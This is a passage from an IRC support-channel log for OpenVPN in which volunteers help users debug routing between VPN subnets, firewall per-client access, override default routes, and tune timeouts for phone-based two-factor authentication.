[Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 15:26 -!- tttttuouuo [~valparais@ARennes-257-1-165-203.w2-10.abo.wanadoo.fr] has joined #openvpn 15:27 -!- tttttuouuo [~valparais@ARennes-257-1-165-203.w2-10.abo.wanadoo.fr] has quit [Client Quit] 15:28 -!- valparaiso [~valparais@pdpc/supporter/student/valparaiso] has quit [Quit: valparaiso] 15:29 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:36 < mythos> hg_5, oh, you are right. the version is 2.2.1-8 15:37 < mythos> and ./pkitool did the job 15:37 < mythos> i don't know, why the script fails, when --interacitve is used 15:39 < hg_5> yeah krzee sorry :D:D 15:40 < hg_5> krzee here is my server config of router's with tomato http://pastebin.com/hwJMx9Pr 15:44 <@krzee> 2 of 4, keep going =] 15:45 <@krzee> oh and i see your comp-lzo doesnt match exactly, make them identical even if it works currently 15:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:46 <@krzee> also, if theres ccd entries, they are needed 15:46 <@krzee> and remember to raise verb before gathering the logs 15:54 -!- MeanderingCode [~Meanderin@173-12-200-221-Albuquerque.hfc.comcastbusiness.net] has quit [Read error: Connection reset by peer] 15:59 < hg_5> krzee what 2 more? what logs exactly? 16:01 < hg_5> krzee so what exactly is needed, paste this: "client-config-dir ccd" into client config on tl-wr1043nd ? 16:02 < tabakhase> is openvpn the right tool to connect 2 networks? say 2 hosts, both connected to a vLAN & by internet and i want to create a bridge that "all hosts in the vlans can use without any bigger configuration overhead on the clients" 16:04 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has joined #openvpn 16:05 < eugenmayer> hello, iam trying to setup a UDP and TCP server to route into the same network. UDP/TCP both run on port 10002, UDP is 10.77.0.0/24 .. TCP is 10.77.1.0/24 … bascially iam doing this 16:05 < eugenmayer> http://pastie.org/6031230 16:05 < hg_5> krzee its also from firewall on tomato's router http://pastebin.com/4gqaMbMq 16:06 < eugenmayer> now i can ping 10.77.0.1 from a client connected to 10.77.1.0 .. but i cannot access any client. for both networks client-to-client is allowed 16:07 < eugenmayer> iam currently reading docs at http://openvpn.net/index.php/open-source/downloads.html .. but i seem to have made a mistake. Can someone give me a hint? 16:07 <@vpnHelper> Title: Community Downloads (at openvpn.net) 16:07 < eugenmayer> sorry...https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 16:07 <@krzee> hg_5, this: 16:07 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 16:07 <@krzee> !logs 16:07 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 16:07 <@krzee> hg_5, no do not put ccd on the client, do you know what ccd is? 16:12 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has quit [Ping timeout: 276 seconds] 16:14 < eugenmayer> i added a traceroute : http://pastie.org/6031252 16:17 <@krzee> eugenmayer, 16:17 <@krzee> !route 16:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 16:17 <@krzee> once you understand that well enough, the rest is easy 16:18 * eugenmayer reading 16:18 <@krzee> you've read it a few times before havnt ya? 16:18 <@krzee> i know i remember ya, dont remember if you did routing before tho ;] 16:19 < eugenmayer> well iam trying to fiddle my way through without going on the nevs of the people in this channel. Well but i think i fail on that last point :) 16:19 <@krzee> does 10.77.0.x have a route to 10.77.1.0? 16:20 <@krzee> *shrug* i cant remember you being on my nerves before 16:21 < hg_5> krzee http://pastebin.com/SAh8Q9ML 16:21 <@krzee> eugenmayer, you may also want more permissive forward rules during testing 16:22 <@krzee> just blindly allow all forward traffic from any tun interface til you get it working 16:22 <@krzee> THEN tune your firewall 16:22 < eugenmayer> krzee: FW is off for now 16:23 <@krzee> thats not good either 16:23 < eugenmayer> well yes the client (10.77.1.2) has this route: http://screencast.com/t/AUjQLbdL22Pb 16:23 <@vpnHelper> Title: 2013-02-02_2322 - EugenMayer's library (at screencast.com) 16:23 <@krzee> unless by off you mean set to allow everything 16:23 < eugenmayer> off means : http://pastie.org/6031297 16:24 <@krzee> cool 16:24 <@krzee> and i dunno what that gui is, but i know its not openvpn 16:24 < eugenmayer> well the backend is openvpn, just a OSX gui for that 16:25 <@krzee> config in openvpn for now, then move on to whatever gui you want later 16:25 < eugenmayer> i know, thats not the best case. If you want me to do that, i can just use a debian client, no issues 16:25 < eugenmayer> krzee: thats "osx"..well.. :) 16:25 <@krzee> on the server that uses 10.77.0.1 you want push "route 10.77.1.0 255.255.255.0" 16:25 <@krzee> and visa versa 16:26 <@krzee> and i use osx, i have NEVER used some gui to configure openvpn 16:26 <@krzee> so its not osx 16:26 <@krzee> its the user ;] 16:26 -!- Cpot-Oblivious is now known as Cpt-Oblivious 16:27 < eugenmayer> krzee: well ok, i did the route on the 10.77.1.0 side, but not the other side. *shrug* 16:27 <@krzee> no route back = no communication 16:27 < eugenmayer> so basically 16:27 < eugenmayer> server 10.77.1.0 255.255.255.0 16:27 < eugenmayer> push "route 10.77.0.0 255.255.255.0" 16:27 < eugenmayer> — 16:27 < eugenmayer> on the one side 16:27 <@krzee> yep 16:28 < eugenmayer> server 10.77.0.0 255.255.255.0 16:28 < eugenmayer> push "route 10.77.1.0 255.255.255.0" 16:28 < eugenmayer> -- 16:28 <@krzee> yep 16:28 < eugenmayer> on the other, right? ok, testing 16:28 <@krzee> and of course you need ip forwarding on in the OS as well 16:28 <@krzee> (not just the firewall) 16:28 < eugenmayer> krzee: you mean on the server i guess ( is on ) 16:29 < eugenmayer> vpn :: /etc/openvpn » sysctl -w net.ipv4.ip_forward=1 16:29 < eugenmayer> net.ipv4.ip_forward = 1 16:29 <@krzee> yes the server 16:29 <@krzee> !ipforward 16:29 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward 16:29 < eugenmayer> (its linux, debian) 16:30 <@krzee> !learn ipforward as ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc 16:30 <@vpnHelper> Joo got it. 16:30 <@krzee> !forget ipforward 2 16:30 <@vpnHelper> Joo got it. 16:30 < eugenmayer> ok, so i did thouse routes, restarted both servers and the client, but still i cant ping 10.77.0.102 16:30 <@krzee> !learn ipforward as ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 16:30 <@vpnHelper> Joo got it. 16:30 < eugenmayer> its working! 16:31 <@krzee> that was a magical 2 seconds 16:31 < eugenmayer> chef turned on the fw on the .102 in the meantime.. 16:31 <@krzee> from not working to working :D 16:31 < eugenmayer> yeah, ping did fail since the fw on the .102 was on again 16:31 <@krzee> gotchya =] 16:32 <@krzee> i was about to say to ping from .102 to .1 on the other subnet, to test .102's firewall :D 16:32 < eugenmayer> krzee++ 16:32 <@krzee> but you beat me to the logical testing =] 16:32 < eugenmayer> You are my personal hero. 16:32 <@krzee> thanks, we actually keep track of karma here now 16:32 <@krzee> !karma 16:32 <@vpnHelper> "karma" is nick++ adds karma nick-- adds bad karma, as seen in !ircstats 16:32 <@krzee> :D 16:32 < eugenmayer> !karma krzee 16:33 <@krzee> nah you did it already 16:33 <@krzee> !ircstats 16:33 <@vpnHelper> "ircstats" is (#1) See http://secure-computing.net/logs/openvpn.html for all-time IRC stats. or (#2) See http://secure-computing.net/logs/openvpn-devel.html for all-time dev channel IRC stats. 16:33 <@krzee> thats where ya see it 16:33 < eugenmayer> i wonderful :) 16:33 < eugenmayer> looks like you are rather the hero of this channel.. 16:33 < eugenmayer> well now i have to switch the VPN server firewall on and see what happens 16:34 <@krzee> it looks like EugeneKay would disagree 16:34 < eugenmayer> but i guess thats simple FW log debugging then 16:34 <+EugeneKay> Mrh 16:34 < eugenmayer> EugeneKay doesnt count, he is like the openvpn-server. He cant be taken into account 16:34 < eugenmayer> Its unfair competition 16:35 < eugenmayer> (hope nobody gets that wrong, that was just a joke..i was banned in #java recently for making a similar joke..before i could explain..) 16:36 <@krzee> im sure you're fine, as long as you dont talk bad about EugeneKay's furballs ;] 16:36 <+EugeneKay> Oh, didn't know pisg does karma 16:36 <+EugeneKay> Is that new in 0.73? 16:37 < eugenmayer> Feb 2 23:36:29 vpn kernel: [1426805.431803] Shorewall:FORWARD:REJECT:IN=tun12 OUT=tun2 SRC=10.77.1.2 DST=10.77.0.102 LEN=64 TOS=0x00 PREC=0x00 TTL=63 ID=30073 DF PROTO=TCP SPT=61915 DPT=2201 WINDOW=65535 RES=0x00 SYN URGP=0 16:37 < eugenmayer> hehe, FW on :) but well thats an easy task 16:37 < eugenmayer> after you helped me with the harder nuts 16:44 <@krzee> yep, everything left should be firewall 16:48 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 252 seconds] 16:50 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 16:50 -!- raidz_away is now known as raidz 16:50 -!- raidz [~raidz@raidz.im] has quit [Changing host] 16:50 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 16:50 -!- mode/#openvpn [+o raidz] by ChanServ 16:53 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 16:55 < eugenmayer> krzee: just for my docs, push "route 10.77.0.0 255.255.255.0" 16:55 < eugenmayer> i though that pushes a route to the client, but thats wrong, right? Thats for the server 16:58 <@krzee> !push 16:58 <@vpnHelper> "push" is usage: push , goes in the server config and makes the command act as if it was in the client config, can be used in ccd entries 16:58 < eugenmayer> well, that means actually iam right? so thouse routes are for the client? 16:59 < eugenmayer> (well kind of makes no sense to me, since the client is 10.77.1.0 ..and we also added it to 10.77.0.0 17:00 < kisom> eugenmayer: If you push a route and the client has the pull directive, then the route will be added at the client side. 17:01 < eugenmayer> hm 17:19 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has quit [Quit: Leaving.] 17:26 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:36 -!- kunago [~Thunderbi@ip4-83-240-40-78.cust.nbox.cz] has joined #openvpn 17:38 < kunago> Hi. Could anyone please give me a hint on how I could possibly limit certain connected clients on my VPN subnetwork? I am connecting 5 different networks via OpenVPN and would like to limit the access of some IP-based clients to the other parts of my VPN network, such as remote subnets. 17:39 < kunago> I am using iptables on my VPN server which I am trying to use. 17:40 < kunago> I read all different possibilities found but nothing really worked. 17:40 <@krzee> im not 100% of what you mean, do you mean you want certain clients to not access certain subnets? or do you mean you dont want them connecting to certain servers? 17:41 <@krzee> both are doable, i just need to know which is the goal ;] 17:41 <@krzee> oh, or is there only 1 server and 4 networks behind clients? 17:42 < kunago> I don't want clients with certain IP addresses to access certain subnets. Lets say my range for one location is 192.168.1.x/24 and 192.168.2.x/24 for another one. And I have some chosen range of clients on the first subnets that I would like to deny the access to the other subnet. 17:42 < kunago> Yes. 17:43 < kunago> One server connecting 5 networks having like 20 clients each. 17:43 < kunago> I hope it makes sense. 17:45 < kunago> I am pushing all the subnets to each of the subnets. Basically as it is, each connected client sees/can see all clients on all subnets. 17:48 < kunago> I know I can limit access of subnets to other subnets via the "ccd" directory which I am doing with success. Now I am trying to limit certain clients on subnets to be able to access other subnets. 17:55 -!- mattock_afk is now known as mattock 18:04 <@krzee> kunago, you must use firewall 18:04 <@krzee> you can limit the added routes, but it means nothing 18:04 <@krzee> because anyone can add a route anyways 18:04 -!- mattock is now known as mattock_afk 18:05 <@krzee> also test what happens when you manually change their IP to another subnet 18:05 <@krzee> you may end up wanting to use topology net30 instead of topology subnet 18:06 <@krzee> (net30 is the default) 18:07 -!- Porkepix [~Porkepix@79.31.185.239] has quit [Quit: Computer has gone to sleep.] 18:07 -!- exed [~maximus@host-188-174-219-251.customer.m-online.net] has joined #openvpn 18:09 < kunago> Well, I may not have explained how the network looks like. So let me re-expain: 18:09 < kunago> - server 18:09 < kunago> -- connecting client (usually router or any other box establishing connection with server, representant of a subnet) 18:09 < kunago> --- client PC connected to router (having automatically access to all subnets through router connected to the server) 18:14 -!- mattock_afk is now known as mattock 18:17 <@krzee> thats what i expected 18:17 <@krzee> !route 18:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 18:17 <@krzee> like that, but with 2 more networks ;] 18:22 < kunago> Doing this, I mean I am routing etc. I know I can limit seeing LANs via CCD but I am trying to limit client PCs connected to clients of VPN server (so basically the layer 3 of the above description). The above does refer to whole LANs as I understand it, not to connected clients for which I assume I need to use iptables in order to limit the access. Or am I wrong? 18:22 <@krzee> kunago, you must use firewall 18:22 <@krzee> you are not wrong, you must use the firewall on your server 18:24 <@krzee> if you were to limit "seeing lans" by limiting routes added, it will not matter 18:24 <@krzee> if im a client, and you only give me the routes you want me to have, what stops me from adding the routes you DONT want me to have 18:24 <@krzee> you must firewall me off if you dont want me accessing stuff, but have things like ip forwarding and return routes setup for the other clients that *should* have access 18:25 < kunago> Good. I am using iptables on the server. The only thing is me not being able to set it up since no settings really work. I was just trying to get help here little someone knew. I was using the FILTER table and was trying to filter by IP address (source or destination) etc. Nothing was preventing clients from pinging the forbidden network. 18:25 <@krzee> the forward chain =] 18:26 <@krzee> and do not use client-to-client in your server 18:26 < kunago> Yeah, tried as well with no luck. 18:26 <@krzee> !c2c 18:26 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things behind 18:26 <@vpnHelper> other clients 18:26 < kunago> OK, that might be it, the C2C setting. 18:26 <@krzee> oh you had it enabled? 18:26 <@krzee> ya that bypasses your kernel all together, no firewall rules apply 18:26 <@krzee> keeps it all inside openvpn 18:28 < kunago> Oh, alright, my bad then. That pretty much explains it then. 18:28 <@krzee> that fixed it? 18:29 <@krzee> and if you really wanna get all ninja 18:29 -!- exed [~maximus@host-188-174-219-251.customer.m-online.net] has quit [Quit: exed] 18:29 <@krzee> you could use a --learn-address script to apply firewall rules, and even have them apply if the client changes his address! 18:30 < kunago> I will need to verify this and write some firewall rules to test but looking at the description that must be the solution - to turn it off and write rules. 18:30 <@krzee> which could read from a db or anything you say! 18:30 < kunago> I am using static addresses for all known clients. The unknown clients should have the red light for anything. 18:30 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds] 18:30 <@krzee> yep, its certainly at least 1 solution, after you test we'll see if theres more issues or not =] 18:31 <@krzee> but if all else was good, then thats it! 18:31 <@krzee> oh i see 18:31 <@krzee> you may like this too if you decide to also limit routes in ccd entries 18:32 <@krzee> ccd/DEFAULT is read when ccd/common-name doesnt exist 18:32 -!- nickanderson_afk is now known as nickanderson 18:35 < kunago> Anyways, thank you a lot for your help. I will see whether the C2C line solves the issue (it takes a while to restart everything and do something useful as I am not a pro), however, I am really glad you were willing to help me with this. Back 2 years when I started with OpenVPN and no clue at all, you were here to help. Back then it was just 2 LANs (quite simple back then) and a few clients. Now it's grown into something wilder and working 18:36 -!- nickanderson is now known as nickanderson_afk 18:36 -!- mattock is now known as mattock_afk 18:36 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn 18:36 < NuclearMeltdown> How do you prevent openVPN from changing the default route? 18:37 < NuclearMeltdown> I have this 128.0.0.0 netmask 128.0.0.0 and 0.0.0.0 same nm going to VPN router 18:37 < NuclearMeltdown> why it's /31 I have no idea to begin with 18:37 <@krzee> easiest way, by not pushing the route to the client 18:38 <@krzee> but since you ask, i assume you dont run the server, right? 18:38 < NuclearMeltdown> right 18:38 <@krzee> kunago, cool! glad it helped before and hope it helps again =] 18:38 < NuclearMeltdown> I removed it by hand, and today it put it back by itself 18:38 <@krzee> i thought your nick was familiar kunago 18:39 <@krzee> !factoids search route 18:39 <@vpnHelper> 'winroute', 'iroute', 'router', 'dlink_static_route', 'external_routes', 'route_override', 'splitroute', 'route_outside_openvpn', 'route_outside_ovpn', 'routebyapp', and 'route' 18:39 <@krzee> hmm 18:39 <@krzee> !route_override 18:39 <@vpnHelper> "route_override" is (#1) https://forums.openvpn.net/viewtopic.php?f=15&t=7161 for how to override --redirect-gateway for a certain subnet or (#2) to see how to make it so the client will still reply to requests to its public ip over the internet and not the vpn see !splitroute 18:39 <@krzee> you could do that with 4 route entries 18:40 <@krzee> just like def1 uses 2 entries to override defualt gateway 18:40 <@krzee> !def1 18:40 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 18:40 <@krzee> or you could use route-nopull and manually add the needed routes for your vpn to work 18:40 <@krzee> and i think theres even a script hook that could add the routes you need and your script could ignore the default routes 18:40 <@krzee> !script 18:40 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 18:41 <@krzee> so theres a couple ways, use what feels warm and fuzzy to you 18:42 < NuclearMeltdown> route-nopull 18:42 < NuclearMeltdown> maybe that thanks 18:43 < NuclearMeltdown> also, incoming connections to my actual IP get send back through the VPN. I'm not sure what happens. Does the return IPv4 address get set to the VPN and then the connection host doesn't recognize the IP and drops the packet? Or does it keep the proper return address (the same used to connect with) and then 18:43 < NuclearMeltdown> send it to the VPN but then it gets dropped since the sending address is outside the allowed range on the VPN firewall 18:49 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:51 <@krzee> its because of redirect-gateway 18:52 <@krzee> if you wanted to keep redirect-gateway and still serve to the internet from internet-ip, 18:52 <@krzee> !splitroute 18:52 <@vpnHelper> "splitroute" is (#1) https://forums.openvpn.net/topic7175.html to see how to add a second routing table so you can use --redirect-gateway AND still serve things to the internet or (#2) see !route_override for how to override --redirect-gateway for a certain subnet 18:54 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn 18:56 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 18:57 -!- mndo [~mndo@188.80.208.101] has joined #openvpn 19:09 -!- kunago [~Thunderbi@ip4-83-240-40-78.cust.nbox.cz] has quit [Remote host closed the connection] 19:14 -!- Eagleman [~Eagleman@5.45.183.189] has quit [Read error: Connection reset by peer] 19:15 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 19:18 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 19:29 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 19:30 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 19:42 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds] 19:44 -!- WinstonSmith [~WinstonSm@84.131.49.60] has joined #openvpn 19:44 -!- WinstonSmith [~WinstonSm@84.131.49.60] has quit [Changing host] 19:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 19:47 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 19:48 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 276 seconds] 20:10 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 20:10 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 20:13 -!- mndo [~mndo@188.80.208.101] has quit [Quit: going home] 20:41 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 20:46 < NuclearMeltdown> Why does it use /31 as the netmask for the two default routes? 20:46 <+pekster> Windows compatability 20:46 < Maverick0984> krzee: PhoneFactor is a program that essentially is a Radius server that also calls your phone and provides 2 factor authentication 20:46 <+pekster> You can use whatever you want in p2p topology NuclearMeltdown 20:46 < NuclearMeltdown> doh 20:47 < Maverick0984> problem is, every openvpn client i have found times out the auth process before the phone call can be completed 20:47 <+pekster> eg: 'ifconfig 192.168.1.2 172.16.10.11' is completely valid in PtP on non-Windows. Very silly, but allowed. 20:47 < NuclearMeltdown> to have the default gateway outside of the network range? 20:47 <+pekster> Maverick0984: You can increase your timeout time. But really, use a better 2-factor method like the google authenticator 20:48 <+pekster> (Unless you really can't use a more modern digital version with --user-pass, like RSA ID or Google Auth) 20:48 < Maverick0984> not really my choice which authenticator to use, it's a microsoft product now, it isn't a junk system 20:49 < Maverick0984> in any case, how do i increase the timeout time? 20:49 <+pekster> You can write scripts to use whatever you want on the backend, independent of the radius :\ 20:49 < Maverick0984> that is what i have been unable to find 20:49 <+pekster> For what, the TLS? 20:49 < Maverick0984> i think it is client side that is the issue 20:49 <+pekster> --tls-timeout or --connect-timeout is probably what you want 20:49 -!- brute11k [~brute11k@89.249.230.122] has joined #openvpn 20:49 <+pekster> Oh, the connect is just tcp, so nvm 20:50 <+pekster> Hmm, there's another timeout option I believe I'm not seeing. IIRC it's something like 60 seconds by default, but I need to find it first :) 20:51 < Maverick0984> the vpn has to be stupid easy, we aren't purchasing an RSA ID system, and a lot of people would be confused by Google Auth 20:51 <+pekster> A system they click the app and type the numbers? 20:51 <+pekster> Okay... 20:51 < Maverick0984> not tech savvy people 20:51 -!- [fred] [fred@konfuzi.us] has joined #openvpn 20:51 < Maverick0984> and not all of the users even have smartphones 20:51 < Maverick0984> so it won't work 20:52 < Maverick0984> after inputting user/pass, i just need it to wait at least 10-15 secs, instead of the 2-3 it actually does wait 20:52 <+pekster> Oh, it's that short? Maybe it is --tls-timeout then 20:52 < Maverick0984> it's very short, yeah 20:52 <+pekster> See that option and it may solve your issue 20:52 < Maverick0984> the call makes it and during the answer it times out 20:52 <+pekster> (default=2 in my 2.3.0 manpage) 20:53 <+pekster> Set that to 30 or something and you should have better results 20:53 <+pekster> The downside is that actual loss of the TLS session will take that long to detect 20:53 <+pekster> But, I presume you want the trade-off 20:53 <+pekster> I dunno, rather than a call, I'd just use x509 certs + user/pass if you wanted 2-factor. But maybe it's an org requirement or such to use your fancy calling system 20:55 <@krzee> Maverick0984, you can do it, it would be a radius script 20:55 <@krzee> radius auth is nothing new in combination with openvpn 20:56 <@krzee> sorry if that was already said, i didnt read all scroll yet 20:56 < Maverick0984> i didn't think it was, it was the phone part that is the issue, disabling the phone auth, and it works great 20:57 <@krzee> "it's a microsoft product now, it isn't a junk system" we must have different definitions of "junk" :D 20:57 < Maverick0984> heh 20:59 <+pekster> Call-to-verify systems have fallen out of populatiry for a reason 20:59 <+pekster> ;) 20:59 <@krzee> [18:46] Why does it use /31 as the netmask for the two default routes? 20:59 <@krzee> NuclearMeltdown, it doesnt, it uses /1 20:59 <@krzee> and it does that to override the default route (/0) without deleting it 20:59 < Maverick0984> pekster: unfortuantely that doesn't help me :-/ do you have a link to that manpage? 20:59 <+pekster> Oh, I read that too fast (I assumed he meant the /31 in a unix PtP, :x 20:59 <@krzee> but /31 doesnt even exist =] 21:00 <+pekster> There's an RFC for using /31's in PtP setups 21:00 <@krzee> oh allllrighty then :D 21:00 <+pekster> Of course, in ipv6 you just use an entire /64 if you want it ;) 21:01 <@krzee> last time i douced your ipv6 in holy water you came back with an upgraded cloak (funny coincidence in timing) 21:01 <+pekster> That, and I'm on freenode via ipv6 now ;) 21:01 <+pekster> Someday you'll join us 21:02 <@krzee> yep, its bound to happen eventually 21:02 <+pekster> Land of lots of IPs, and sometimes bad ISPs that try to give you anything less than a /56 21:02 < Maverick0984> krzee: so you are saying the work needs to be done on the radius server then? not the client? 21:02 <@krzee> Maverick0984, nope, i say you simply need a script to handle it all 21:02 <@krzee> on the server 21:02 <@krzee> and a script on the client to collect the info from client 21:02 <@krzee> !authpass 21:02 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name 21:03 <@krzee> one of those, but for radius 21:03 <+pekster> The deal is his radius has a callout backend, so the timeout needs to go up to support the insane delay that'll cause 21:03 <+pekster> ie: --client-connect is going to effectively block until that's done 21:04 < Maverick0984> yeah, i don't need more info inputted on the client side 21:04 <@krzee> oh well that could be a big problem 21:04 <@krzee> if your authpass wont happen quick enough, you'll be fubar 21:04 <+pekster> Not with --tls-timeout (I think client-side only is fine, although you may need that both sides) 21:04 <@krzee> whats it calling out to? 21:04 <+pekster> a phone. A literal call ;) 21:04 < Maverick0984> just a cell phone or any phone 21:04 <@krzee> omg 21:04 <@krzee> heh have fun 21:04 * pekster already suggested it wasn't a great solution, but apparenlty it's "required" 21:04 < Maverick0984> then the user hits # and the auth completes 21:04 <@krzee> http://permalink.gmane.org/gmane.network.openvpn.user/11626 21:05 <@vpnHelper> Title: RADIUS-Plugin for authentication and accounting (at permalink.gmane.org) 21:05 <@krzee> thats the radius stuff 21:05 <@krzee> even when you get it working, you'll have the problems pekster mentioned 21:05 < Maverick0984> the "radius stuff" works fine 21:05 <@krzee> and your non-technical users will hate you 21:05 < Maverick0984> i've had that working 21:05 <@krzee> yes the radius stuff will work 21:05 <@krzee> but openvpn will timeout 21:05 < Maverick0984> and the phoen call stuff worked fine with PPTP 21:05 <@krzee> before most responses most likely 21:05 <@krzee> !pptp 21:05 < Maverick0984> but i don't want to have to use PPTP 21:05 <@vpnHelper> "pptp" is (#1) PPTP is known to be a faulty protocol. The designers of the protocol, Microsoft, recommend not to use it due to the inherent risks. Lots of people use PPTP anyway due to ease of use, but that doesn't mean it is any less hazardous. The maintainers of PPTP Client and Poptop recommend using OpenVPN (SSL based) or IPSec instead. http://pptpclient.sourceforge.net/protocol-security.phtml to 21:05 <@vpnHelper> read about why to not use pptp or (#2) Why not to use it: http://en.wikipedia.org/wiki/Pptp#Security or (#3) https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/ 21:05 <@krzee> apple vs orange, no point in mentioning 21:05 <+pekster> Just increase the --tls-timeouts to handle the server blockage 21:06 < Maverick0984> just saying that's where it came from... 21:06 <@krzee> pekster, if he uses a plugin it wont block 21:06 <@krzee> like the scripts dop 21:06 <@krzee> do* 21:06 <@krzee> plugins get their own thread 21:06 <+pekster> Ah, okay 21:07 <@krzee> maybe high enough timeouts will fix it 21:07 <@krzee> may as well check i guess! 21:07 <@krzee> Maverick0984, you got my link to radius plugin, right? 21:08 < Maverick0984> yeah, i'm looking at it, but i have radius auth working, what does this get me? 21:08 <@krzee> you have radius auth working on openvpn already? 21:08 < Maverick0984> yeah 21:08 < Maverick0984> works great 21:08 <@krzee> mayve im misunderstanding something then 21:08 <@krzee> whats not working? 21:08 < Maverick0984> 21:05:13 < Maverick0984> the "radius stuff" works fine 21:08 < Maverick0984> heh 21:08 <@krzee> what stuff doesnt? 21:09 < Maverick0984> if i disable the phone call, everything is peachy 21:09 < Maverick0984> it's the phone call being used for 2 factor that is the problem 21:09 < Maverick0984> the client timesout the authentication process 21:09 < Maverick0984> and asks for credentials again during the call 21:09 <@krzee> does the phonecall ever happen? 21:09 < Maverick0984> essentially looping 21:09 <@krzee> ahh ok 21:09 < Maverick0984> yeah, it happens 21:09 <@krzee> ahh ya thats what pekster was saying would happen 21:10 <@krzee> try increasing the timeouts like he said 21:10 < Maverick0984> just a line in teh config files? 21:10 <@krzee> but really, it might just be a shitty way to do 2-factor auth on things that are time sensitive 21:11 <@krzee> also, is there a reason you feel phones are somehow secure? 21:11 <+pekster> There's a reason most rotating-numeric schemes (RSA ID, google auth, etcc) all use a *lest* a 30-seocnd timeout; that's the smallest a user can usually handle 21:11 <@krzee> cause personally i cant think of a less secure device in my arsenal 21:11 < Maverick0984> sigh, this wasn't my decision to use 21:11 < Maverick0984> it's more secure than user/pass 21:12 < Maverick0984> hense, 2 factor 21:12 <+pekster> Not when you combine x509 too 21:12 <+pekster> x509 (something the user has) + user/pass (something the user knows) is the textbook definition of a secure 2-factor scheme 21:12 < Maverick0984> what? it's a second level, even if the second level isn't secure, 2 levels is still more secure than 1 level 21:12 <+pekster> Yes, yes, I'm very well aware of 2-factor auth 21:12 <@krzee> !goodsecurity 21:12 <@krzee> hrm 21:12 <@krzee> !factoids 21:12 <@vpnHelper> "factoids" is A 